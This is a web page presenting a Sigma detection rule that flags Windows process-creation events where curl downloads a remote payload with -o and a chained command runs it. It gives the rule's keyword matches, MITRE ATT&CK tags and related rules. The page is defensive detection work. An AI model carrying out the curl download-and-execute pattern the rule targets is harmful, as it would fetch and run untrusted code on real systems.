Curl Download And Execute Combination
Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
Sigma rule (View on GitHub)
1title: Curl Download And Execute Combination
2id: 21dd6d38-2b18-4453-9404-a0fe4a0cc288
3status: test
4description: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
5references:
6 - https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 # Dead Link
7author: Sreeman, Nasreddine Bencherchali (Nextron Systems)
8date: 2020/01/13
9modified: 2024/03/05
10tags:
11 - attack.defense_evasion
12 - attack.t1218
13 - attack.command_and_control
14 - attack.t1105
15logsource:
16 category: process_creation
17 product: windows
18detection:
19 selection:
20 CommandLine|contains|windash: ' -c '
21 CommandLine|contains|all:
22 - 'curl '
23 - 'http'
24 - '-o'
25 - '&'
26 condition: selection
27falsepositives:
28 - Unknown
29level: high
References
Related rules
- Import LDAP Data Interchange Format File Via Ldifde.EXE
- File Download Via Windows Defender MpCmpRun.EXE
- Insensitive Subfolder Search Via Findstr.EXE
- Remote File Download Via Findstr.EXE
- Password Protected ZIP File Opened (Suspicious Filenames)